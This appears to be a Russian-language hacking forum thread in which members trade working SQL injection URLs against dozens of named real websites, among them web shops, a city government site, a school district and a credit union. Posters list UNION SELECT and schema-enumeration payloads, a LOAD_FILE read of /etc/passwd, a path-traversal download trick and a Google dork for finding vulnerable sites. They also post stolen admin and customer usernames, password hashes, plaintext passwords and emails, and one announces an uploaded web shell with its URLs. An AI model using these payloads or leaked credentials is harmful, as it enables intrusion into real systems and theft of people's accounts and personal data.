GTA.com
ttp://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(USER(),0x3a,VERSION(),0x3a, DATABASE())/*
root@localhost:4.0.12-log:gta
http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+my sql.user/*
http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+my sql.user+limit+2,10/*
jmontilla:12107ef60046dd4c

http://www.mamochka.org/modules.php?name=Top&querylang=union+select+1,TABLE_NAME,3,4+from+INFOR MATION_SCHEMA.TABLES/*

http://simplymichigan.com/blog/index.php?cat_id=99999+union+select+1,2,3,4,concat _ws(0x3a,user_name,password),6,7,8,9,10,11,12+from +users/*
michi18_michigan@localhost:michi18_michigan:4.1.22-standard

http://www.absolutemusic.co.uk/shop/index.php?cat_id=99999+union+select+1,2,3,4,5,6,7, 8,9,10/*

absolute@localhost:absolute_:4.1.21-standard-log

ШОП discountcycleshop.co.uk


http://discountcycleshop.co.uk/product_details.php?product_id=999+UNION+SELECT+1, 2,3,4,5,6,7,concat_ws(0x3a,user(),version(),databa se()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34/*

ddbuser1@localhost:4.1.22:discountdb

http://gp.by/index.php?mode=cat&cat_id=99999+union+select+1,2,3,4,5,6,7+from+admin/*

http://www.photosale.ru/index.php?page=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*

5.0.45-log/u41000/u41000@10.10.223.73

-----------------------------------------------------------------------------

biorust.com


http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12/*

5.0.22/biorust_com/biorust@localhost


http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,admin_name,admin_ password),3,4,5,6,7,8,9,10,11,12+from+biorust_com. linkbase_admins+limit+0,1/*

имя/хеш
Scrowler/4c2e348299295d7b87fa02fd14d89c7b


http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,2,3,4,concat_ws(0x2F,username,pa ssword,email,icq),6,7,8,9,10,11,12+from+biorust_fo rums.user+limit+41000,1/*

логин/хеш/мейл/уин
premutos/35a8e932251deca43174675add295437/n.turovsky@gmx.de/

http://www.obereg.ru/spec.html?id=-1+union+select+1,2,3,4/*
[ obereg@localhost ]
[ 4.1.11-standard ]
[ db_obereg ]

==========================
http://www.visit-palawan.com/picture_gallery.php?categories=60&select_cate=-1+union+select+1,2,3/*
5.0.45-community-log
visitchi_root@loclhost
visitchi_palawan

http://grate.ru/index.php?cat_id=13'+union+select+0,1,2,3,4,5,conc at(version(),0x3a,user(),0x3a,database()),7,8,9,10 ,11,12,13,14,15/*

Нет доступа к шемке:РР

http://topofgames.com/index.php?cat_id=72'

Подставил какое-то значение не помню,вывело ашиппку.Стоит фильтрация на кавычку.Вместо неё куча обратных слешей:РР

http://www.dotfiles.com/index.php?cat_id=-6+order+by+1/*

Дыра есь,но как обойти хз:РР


http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,3/*

Дальше не канает :Р

mega.km.ru
http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=@@version
@@version Microsoft SQL Server 2000 - 8.00.2039 (Intel IA-64) May 3 2005 23:34:52 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 1)
db_name() ojigov
system_user mega_link


через
http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=(SELECT+TOP+1+TABL E_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_ NAME+NOT+IN+('dtproperties'))--
нашел таблицы:
dtproperties
Rubr
RubrLinksStat
Search
Stat
StatOrder
sysconstraints
syssegments

но интересных колонок в них не нашел=/
p.s. в mssql я очень плохо разбираюсь, это вобще моя первая mssql inj, так что не судите строго, делал всё согласно статье (http://forum.antichat.ru/thread30501.html) от [ cash ]

sosna1.ru
version() 5.0.45-log
user() u71952@10.10.223.224
database() u71952
http://sosna1.ru/info.php?infoid=19999+union+select+1,2,3,concat(ve rsion(),0x3a,user(),0x3a,database()),5,6,7,8,9,10, 11/*

ethanol.org
version() 4.1.15
user() ETHANOL@LOCALHOST
database() ETHANOLDB

djbattle.net
version() 4.1.12
user() djbattle@localhost
database() djbattle
http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,convert(conca t(version(),0x3a,user(),0x3a,database()),binary),5 ,6,7,8,9,10,11/*
нашел таблицу users.
http://www.djbattle.net/tv.php?tvID=99999+union+select+111,2,333,convert(c oncat(min(id),0x3a,user,0x3a,pass,0x3a,mail),binar y),5,6,7,8,9,10,11+from+users/*
id:user:рass:mail
3:tobbe:1skills2:info@djbattle.net
он видимо админ

2 Велемир

Не тормози =\

http://www.dotfiles.com/index.php?cat_id=6+UNION+SELECT+1,2,3,4,5,6,concat _ws(0x3a,version(),user(),database())/*
http://www.nlstar.com/catalog/index.php?cat_id=17'+UNION+SELECT+1,2,concat_ws(0x 3a,version(),user(),database())/*

http://www.mosenergo.ru/

http://www.mosenergo.ru/eng/index.php?id=226&news_id=-1055+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5+FROM+information_schema.tables/*&theme=56&sessid=4a
5.0.45-log:site@zvm5

http://la2ic.ru/notes.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*
5.0.41-community-log
la2icru_1
la2icru@localhost

-1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--

обязательно добью :)

xcedz

-1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--

не работает .

http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,concat(username,0x3a,password),17,18,19,20,21,22, 23,24,25+from+kew_users/*
http://www.job.khit.info/administrator/
admin:40b5bf20806a044392ea48bc5c436262

SQL Инъекция в Joomla/Mambo Component Job (com_job), нашел я, но сайтов больше с такой инъекцией не нашел.

еще таблицы на этом домене (другие движки)
http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,table_name,17,18,19,20,21,22,23,24,25+from+inform ation_schema.tables/*

xcedz

-1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--

не работает .
пробел сотри :)

должно быть так -1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--

http://www.islamicamagazine.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.pinfosystems.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.marketinginstyle.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.hatfielddesign.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.mangsidig.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.minet-services.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.bacanak.net/1/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.adeosys.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.sonicracingteam.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.fogl.co.yu/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.g-linq.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.ninaris.hu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users+limit+1/*
http://www.pcl-assistance.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.regionaleartiesten.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.seventystudio.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.rstasarim.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.tribudefilles.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
http://www.open-business.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*

PS Начинаем утреннею зарядку =)))

Mambo Component Events SQL Injection
http://www.nwen.org/index.php?option=com_events&Itemid=15&id=-1+union+select+concat(username,0x3a,password),2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mos _users/*
http://www.nwen.org/administrator/
admin;admin

Найдено мной, сайтов с данным компонентом много, но на большинства, почему-то ничего не передается параметром id, который собственно и уязвим =/

http://www.kompak.ru:8100/new/news/new.php?num=-342+union+select+1,2,3,4,5,6,7/*
dbname = www
dbuser =www@localhost
dbversion =4.0.20

www.uselessjunk.com PR4

http://www.uselessjunk.com/article_full.php?id=-12689+union+select+1,2,3,4,5,concat_ws(0x3A3a,vers ion(),database(),user()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23/*

version: 5.0.26-Debian_2-log
database: uselessj_uj2006
user: uselessj_ohshitw@localhost


http://www.uselessjunk.com/article_full.php?id=-12689+union+select+1,2,3,4,5,concat_ws(0x3A3a,fld_ username,fld_password,fld_id),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23+from+tbl_admin/*


Через лимит выводим всех админов.


www.uselessjunk.com/admin.php -админка.
Есть форум, на дедике.

Но выведенные данные не подошли никуда,а к фтп я так и не смог законнектица.Шелл залить так же не вышло.
:(

http://www.novostroy.ru/law/direct.php?num=1056437&id=99999+union+select+1,2,3/*

wwwnov@localhost:law:4.0.27-1-log




http://www.wholehealthexpo.com/information.php?infoid=99999+union+select+1,2,3,4, 5,6/*

dbheal@linhostssl16.prod.mesa1.secureserver.net:db heal:4.0.27-max-log


http://www.plenki.net/shipping.php?infoID=99999+union+select+1,2,3/*

u10744@10.10.153.160:u10744:5.0.45-log

http://www.betonmaster.ru/index.php?view_info=yes&infoID=99999+union+select+1,2,3,4/*

zrim@localhost:betonmaster:4.1.22-log






http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,concat_ws(0x3 a,user,PASS),5,6,7,8,9,10,11+from+users+limit+0,1/*

roundcube:583e2e1b2957e824

http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,concat(user, 0x3a,password)+from+mysql.user/*

admin:40e369d51c6bd8e2
pma_WHy8zYQ73Zhn:1c4230400a8e14af
horde:234994c1665bd570
nl_star:270037157a74bbe3
nl_star_django:2490e08f0895cc0b

:PPPPPPP

www.davisvisitor.com

_http://www.davisvisitor.com/additional.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5/*

4.0.16:dvb@localhost:dvb

Ни одной таблицы не смог подобрать. Если кто сможет-отпишите плз...

дерзаем
http://www.rugbysport.com/customer_testimonials.php?testimonial_id=7599999
/**/union/**/select/**/1,2,concat(customers_lastname,0x3a,customers_passw ord,%200x3a,customers_email_address),4,5,6,7,8/**/from/**/customers/*
Таблицы
counter

http://www.modxcms.com
Официальный сайт CMS MODx

Существует иньекция и возможность скачать любые файлы с сайта.
Пример ссылки:
http://www.modxcms.com/assets/snippets/repository/repo_download/download.php?dwnParam=Li4vLi4vLi4vLi4vLi4vLi4vLi4v Li4vLi4vLi4vLi4vLi4vLi4vLi4vaG9tZS9odHRwZC92aG9zdH MvbW9keGNtcy5jb20vaHR0cGRvY3N8MTAzNyBBTkQgMT0xfHJl cG9fZGNvdW50fGluZGV4LnBocHxwYXNzd2Q
Для иньекции передаём строку кодированную в base64, приблизительно такого содержания:
1|2|repo_dcount|3|blabla.txt
1. - путь к файлу
2. - уязвимый параметр для SQLinj
3. - имя файла который хотим скачать
пример:
../../../../../../../../../../../../../../home/httpd/vhosts/modxcms.com/httpdocs|1037 AND 1=(select 1)|repo_dcount|index.php|passwd
--------------------------------------------------
не претиндую что первый, но нашёл 30 мин назад, хотел ставить себе эту CMS....

http://www.superchrono.com/index.php?main_page=customer_testimonials&testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/*

master@localhost:zenc:4.1.20

root:0015e5715c9d1718
vpopmail:1fbced3233935493
adminlink:186384a54d6ca922
master:5e80e4ce3bd7ea43
zic3cn:7231449d61b83801
zic2:7231449d61b83801
zicmasteruser:7231449d61b83801



http://store.workshopsupply.com/catalogue/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,3,4,5,6,7,8/*

workshop_admin@localhost:workshop_workshopsupply:5 .0.45-community-log



http://www.mrgadget.com.au/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,3,4,5,6,7/*

mrgad@203.202.10.76:mrgad_db:4.1.22-standard-log


http://www.bodyguardforwomenhearts.com/store/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,3,4,5,6,7,8/*

bodyg_shop@localhost:bodyg_shop:4.1.22-standard-log



http://www.247av.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,3,4,5,6,7,8/*
kunal060912@localhost:247av_com_-_newosc:4.1.22-standard

Черт, народ, это ханипот чтоли?) Мне понравилась страница, выскакивающая при подставлении на сайте кавычки.
http://www.hauteecole.ru/ru/horses.php?sid=0&id=5
Но ссылка заинтересовала. Таки скуля? :)

*ушла искать как обойти эту фильтрацию*)))

http://www.alparysoft.ru/products.php?id=10&item=14+union+select+1,2,3,4,5,6,7,8,9,10,version, 12,13,14,15,16,17,18,19,20,21,22,23/*

http://galaxyit.ru/corp_systems/article_full.php?id=

4.1.22-standard/galaxyit_base/galaxyit_root@localhost
===================================
-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*
=====================================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.mediafetcher.com/article_full.php?id=
====================================
5.0.26-Debian_2-log/uselessj_uj2006/uselessj_ohshitw@uj4.uselessjunk.com

===================================
[COLOR=Black]-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,versio n(),database(),user()),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/*
=====================================
админка matt::diabl0::4
(-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3A3a,fld_ username,fld_password,fld_id),9,10,11,12,13,14%20, 15,16,17,18,19,20,21,22,23+from+tbl_admin/*)

2xcedz если мускул >= 5 то можно работать через information_schema
http://www.uselessjunk.com/article_full.php?id=99999+union+select+1,2,3,4,5,t able_name ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+f rom+information_schema.tables+limit+0,1/*
http://www.uselessjunk.com/article_full.php?id=99999+union+select+1,2,3,4,5,t able_name ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+f rom+information_schema.tables+limit+1,1/*
http://www.uselessjunk.com/article_full.php?id=99999+union+select+1,2,3,4,5,t able_name ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+f rom+information_schema.tables+limit+2,1/*
итд... потом таким же образом вытаскиваеш названия колонок (column_name)

http://www.celadon-international.com/place.php?id=-1+union+select+1/*
http://www.travel-to-peloponese.com/place.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17/*

2xcedz and 2Mobile
Вы тему смотрите вообще? 0_o
На предидущей странице db_reader уже нашёл эту уязвимость и повыводил админов! Зачем боянить? Ладно б страницы 3 назад, так всего пару постов...
___________________________
Added:
Чтобы в тему:
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-125823+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,n ame,pwd,userid),8,9,10,11,12,13,14,15/*
Ну и лимитом выводим..

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/haute/domains/hauteecole.ru/public_html/shop/template/header.php on line 60

Мальчики, неужели вы обьявите мне игнор? :( тут:
http://shop.hauteecole.ru/news.php?id=1'
Пыталась запросы вида:
http://shop.hauteecole.ru/news.php?id=1'+select+union+1,2,3,4,5,6/*
Или так, хотя один ли фиг:
http://shop.hauteecole.ru/news.php?id=1'%20select%20union%201,2,3,4,5,6/*

Мальчики, скажите мне, блондинке, как заставить этот долбаный мускуль :( выдать хоть какие-то результаты? Тупо подбирать столбцы, или надо извращаться?

Залил шел на www.miheeff.ru мож кому надо, у него и подсайтов многа.

http://dvd.miheeff.ru/aaadmin.php

http://sms.miheeff.ru/sms_en.php

http://miheeff.ru/php.php

http://www.dedefensa.org/choix.php?comm=1&link_id=99999+union+select+1,2,3,4,5,6,7,8,9/*

dedefensa@localhost:dedefensa:5.0.45

2 Digital Cat

Не плачь =)

http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat_ws(0x3a,version(),user(),da tabase())/*
5.0.22:haute_shop@localhost:haute_shop

О_о 1? И это все?)) Нда... Несерьезно))
Спасибо!
http://www.horse-kontinent.ucoz.ru/Smails/girl_in_love1.gif

О_о 1? И это все?)) Нда... Несерьезно))
Спасибо!
http://www.horse-kontinent.ucoz.ru/Smails/girl_in_love1.gif


http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat(password,char(58),login,cha r(58),id)+from+users/*

fe83361168623c81f8a8f11a8270ef7b:Liliya1976:2

http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat_ws(0x3A,table_schema,TABLE_ NAME)+FROM+INFORMATION_SCHEMA.TABLES+limit%2028,13/*
Таблы
CHARAKTER SETS, collations, COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS about basket catalog delivery finance news orders pages params payment structure typegoods users

http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+column_name+from+information_schem a.columns%20limit%204,1/*
колонки
CHARACTER_SET_NAME DEFAULT_COLLATE_NAME DESCRIPTION MAXLEN COLLATION_NAME



NO COMENTS IN MY POST

http://www.superherohype.com/news/300news.php?id=-4610+union+select+concat_ws(0x3a,version(),user(), database())/*
Смотрим в заголовок, где и выводится инфа :) ЫЫЫЫЫ :D
Суперхер... :D

2xcedz and 2Mobile
Вы тему смотрите вообще? 0_o
На предидущей странице db_reader уже нашёл эту уязвимость и повыводил админов! Зачем боянить? Ладно б страницы 3 назад, так всего пару постов...
___________________________
Added:
Чтобы в тему:
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-125823+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,n ame,pwd,userid),8,9,10,11,12,13,14,15/*
Ну и лимитом выводим..
нафиг мне смотереть кучу однообразных инъекций?
просто я решил объяснить челу про information.schema а он оказывается уже знает...

Скуль я выкладывал раньше, потом я ее удалил...и естественно я не смотрел на предыдущую страничку.. Чуваку нашедшему и раскрывшему до конца скуль респект и уважуха! в отличе от меня ему было не лень найти логины и пасы на админку :)

http://www.doktor-al.ru/get_news.php?news_id=99999+union+select+1,2,3,4,5, 6,7/*

doctor_al_ru@localhost:doctor_al_ru:5.0.24a


http://www.daoctemplates.net/viewUser.php?UserID=99999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,concat_ws(0x3a,username,password,email) ,29,30,31,32,33+from+users/*

daoctemplates@localhost:daoctemplates:4.1.20

kair
http://www.koshkindom-horse.flyboard.ru/images/smiles/heart.gif http://www.koshkindom-horse.flyboard.ru/images/smiles/give_rose.gif

И впрямь no comments))

http://www.upvaft.org/articles/index.php?id=-54+union+select+1,2,3,4,concat_ws(0x3A3a,version() ,user(),database()),6,7,8,9,10,11/*

4.1.22-standard::upvafto_php@localhost::upvafto_content

Таблицы не искал, нет времени.

http://topmanagement.com.mx/modules.php?name=Noticias&file=seccion&idseccion=-1+union+select+aid+from+nuke_authors--

http://artslivres.com/ShowArticle.php?Id=-1+union+select+0,1,2,3/*

Хз как дальше- вроде пральное число столбцов,а пишет неизвестное число.В конце пишет 0,0- хрень...

http://www.shejay.net/artistDetail.php?userID=99999+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33/*

web84_u1@localhost:web84_db1:5.0.32-Debian_7etch4-log

http://moshonka.ru/anketka.php?userid=99999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18/*

db20@80.77.86.211:db20:5.0.45-Debian_1



http://www.basketball.ru/netcat/modules/user/profile.php?userid=99999+union+select+1,2,3,4,5,6, 7/*



http://www.rematico.com/shop.php?userid=99999'+union+select+concat_ws(0x3a ,user(),database(),version()),2,3/*

usr_phpprobid@localhost: DB_phpprobid:4.1.20


http://teams.supercheats.com/category.php?cid=1'+union+select+1,2,3/*


webuser@localhost:supercheats_forum:4.1.20 Related

http://www.chinesekungfuhustle.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
4.0.25:kungfu@localhost:kungfu

http://ourcoffeebarn.com/estore/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
5.0.45-community:ourcoffe_osc1@localhost:ourcoffe_osc1 (ммм пятая версия это хорошо =))))
посмотрим что тут у нас в INFORMATION_SCHEMA.TABLES
http://ourcoffeebarn.com/estore/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,TABLE_NAME,4,5,6,7,8+FROM+INFORMATIO N_SCHEMA.TABLES/*
http://www.tiendaslatinas.com/centrocomercial/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
4.1.22-standard:luis2@localhost:luis2_tienda

http://www.signbabies.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
4.1.20-log:inksp3c1_12@209.68.3.204:inksp3c1_signbabies

http://www.ameripromo.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers
/*
4.1.20-log:inksp3c1_19@209.68.3.204:inksp3c1_ameripromo
http://www.affiliatesexcel.com/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*

вота =)))

Интернет магазин
usb.brando.com.hk
http://usb.brando.com.hk/prod_list.php?dept_id=015&cat_id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,VERSION(), 13,14,15,16,17,18/*
4 версия :rolleyes:

http://russiancinema.ru/template.php?dept_id=3&e_dept_id=99999+union+select+1,concat_ws(0x2F,vers ion(),database(),user()),3,4/*

5.0.32-Debian_7etch3-log/seanceitstar/seanceitstar@hosting.itstar.ru

как я понял управляется starcms.. поэтому в полне возможно что и на других проектах прокатит... хз :)

ЗЫ с перебором влом было возится.. кому нужно думаю подберет ;)
++++++++++++++++++++++++++++++++++++++++++++++++
http://www.leika.ru/pages/articles.php?item_id=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(), database(),user()),7,8,9,10,11/*
4.0.27-standard/db_leika1/leika1@localhost

http://www.at-g.ru/
http://www.at-g.ru/index.php?base_name=atg_second&id=0x3127%20union+select+1,2,concat_ws(0x2F,versio n(),database(),user()),4,5,6,7/*
5.0.24-standard/db_atg1/atg1@localhost.localdomain



http://www.ac-psych.org/index.php?id=0x3127%20union+select+concat_ws(0x2F, version(),database(),user())/*

5.0.33-log/acpsych_ac-psych/acp_ac-psych@81.2.203.24

Мои первые SQL инекций которые я сам сделал)
за это респект LoFFi (http://forum.antichat.ru/member.php?userid=22383), BizzyD (http://forum.antichat.ru/member.php?userid=37232), Piflit (http://forum.antichat.ru/member.php?userid=26380) и it's my (http://forum.antichat.ru/member.php?u=42412). Еще с 9 утра сидел чтоб все норма понять, и напряг мозги и получилось) вот так вот ;)

Я нашел скуль:
http://event.zontik.ru/?cat=30'
Пробовал раскрыть его, но ничего не получается=((
Помогите пожалуйста раскрыть скуль.

Я нашел скуль:
http://event.zontik.ru/?cat=30'
Пробовал раскрыть его, но ничего не получается=((
Помогите пожалуйста раскрыть скуль.
http://event.zontik.ru/?cat=-1'+union+select+concat_ws(0x2F,version(),database( ),user())/*

5.0.41-log/zontikweb/zontik_grab@localhost
а дальше сам попробуй если не получиться помогу
:D
стало самому интересно
http://event.zontik.ru/?cat=-1'+union+select+TABLE_NAME+FROM+INFORMATION_SCHEMA .TABLES/*
вот какие таблицы нашел :
COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,C OLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE
PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STAT ISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,T RIGGERS
USER_PRIVILEGES,VIEWS,del_status,dns_a,dns_cname,d ns_dep,dns_isp_dns,dns_mx,dns_nodes,dns_secondary, dns_spf,doctype,groups
help_documents,help_nodes,help_tickets,isp_com,isp _dep,isp_dienste,isp_fakt_artikel,isp_fakt_dep,isp _fakt_nodes,isp_fakt_rechnung
isp_fakt_record,isp_firewall,isp_htaccess,isp_isp_ actions,isp_isp_admin,isp_isp_datenbank
LOAD_FILE:
http://event.zontik.ru/?cat=-1'+union+select+LOAD_FILE('/etc/passwd')/*

http://event.zontik.ru/?cat=-1'+union+select+user+from+mysql.user/*
user:whole
пароль не смог узнать (((
и шелл не получаеться залить
еси кто осилит сообщите мне плизз :(

http://www.newkurkino.ru/modules.php?op=modload&name=News&file=article&sid=0x3127%20union+select+1,concat_ws(0x2F,version (),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21/*

4.0.26-log/udb223/Uwww223S@localhost

www.ci.petoskey.mi.us
http://www.ci.petoskey.mi.us/gallery2.php?gallery_id=-5+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5/*
5.0.27-log:cityofpetoskey@localhost:cityofpetoskey
http://www.ci.petoskey.mi.us/gallery2.php?gallery_id=-5+union+select+1,concat_ws(0x3a,id,username,passwo rd),3,4,5+from+mgr_users+limit+0,1/*1:admin:employee104

www.warwick.k12.pa.us
http://www.warwick.k12.pa.us/news.php?id=-3+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9/*
4.0.24:root@localhost:basmati

KOOBI CMS

уязвимость в параметре img_id

пример поиска уязвимых сайтов в гугле

allinurl:"index.php?p=gallerypic" результатов порядка 4500 тыс. !!!

Пример уязвимого сайта:

код:

http://www.ria-alliance.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
________________________

для новичков!

чтоб увидеть инъекцию в действии на любом другом сайте работающем на этом движке,достаточно вставить код обозначеный красным цветом в примере уязвимого сайта.

PHP Live! 3.2.2
https://www.msufcu.org/knowledge_searchm.php?mnuccid=65&l=&x=&action=expand_question&questid=-230%20union%20select%201,2,3,4,5,6,7,concat(login, char(5),password)+from+chat_admin--&deptid=3&catid=4&keyword=

http://ykm.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://sotovic.org/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
